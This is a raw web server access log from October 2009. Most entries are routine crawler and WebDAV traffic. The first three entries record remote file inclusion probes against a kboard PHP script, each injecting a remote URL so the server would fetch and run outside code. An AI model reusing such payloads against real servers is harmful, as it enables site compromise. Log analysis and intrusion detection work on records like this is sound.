98.129.217.53 - - [28/Oct/2009:06:40:38 -0400] "GET /logs/access_log.Q109051600%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:06:40:42 -0400] "GET /logs/access_log.Q109070500%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:06:40:43 -0400] "GET /logs/access_log.Q109070500%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.249.65.201 - - [28/Oct/2009:06:41:00 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L41744E4A4059A0001BA9085+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.16.1.180 - - [28/Oct/2009:06:42:09 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Oct/2009:06:42:09 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Oct/2009:06:42:09 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
67.195.110.164 - - [28/Oct/2009:06:42:42 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.110.164 - - [28/Oct/2009:06:42:42 -0400] "GET /logs/access_log.Q108121900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
